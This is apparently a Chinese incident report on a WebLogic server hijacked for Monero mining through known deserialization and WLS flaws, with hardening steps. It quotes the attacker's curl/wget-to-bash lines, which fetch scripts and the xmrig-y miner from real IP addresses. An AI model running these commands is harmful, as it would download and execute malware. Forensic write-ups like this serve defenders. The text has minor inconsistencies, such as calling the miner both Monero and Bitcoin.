背景
某台运行有weblogic的服务器短时间内CPU使用率飙升到80%以上,严重影响正常业务程序使用。
初步结论
结合流量中的上百次的挖矿行为与主机端扫描出的恶意文件,初步判断是通过Weblogic服务进行挖矿的一次恶意事件。黑客可能通过利用 WebLogic 反序列化漏洞(CVE-2017-3248 )和 WebLogic WLS 组件漏洞(CVE-2017-1027 1)对企业使用WebLogic WLS组件的业务进行入侵并植入
过程取证
通过查阅Linux的相关日志,发现有恶意用户通过执行curl命令与wget从远程服务器获取到脚本并使用bash命令成功执行。并且下载了名为xmrig-y的门罗币最块CPU挖矿软件
curl 45.123.190.178/lin.txt| bash
wget -q0 -http://45.123.190.178/lin |bash
curl 45.123.190.178/lin.txt| bash
downloader http://165.227.215.25/xmrig-y
详细的脚本内容参考如下
该脚本首先会杀掉本机上的python和java程序,然后下载运行比特币的挖矿程序xmrig-y(xmrig-y.exe,该程序被多款杀毒软件标示为挖矿或恶意木马程序),然后伪装成java文件运行
经过检查Weblogic的版本为 版本,且存在wls-wsat.war的war包
VT查杀进一步确认恶意文件样本
加固建议
1.删除wls-wsat应用包
WebLogic11g版本,wls-wsat应用包的位置:$WL_HOME/server/lib/wls-wsat.war
2.删除每个WebLogic Server目录下的tmp目录
有JSP网页木马已经潜伏在
$DOMAIN_HOME/servers/SERVER_NAME/tmp/_WL_internal/bea_wls_internal/目录下管理、被管Server均需执行。
位置:$DOMAIN_HOME/servers/SERVER_NAME/tmp
3.更新补丁和扫描:
更新Oracle官方发布相关补丁,下载链接:
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html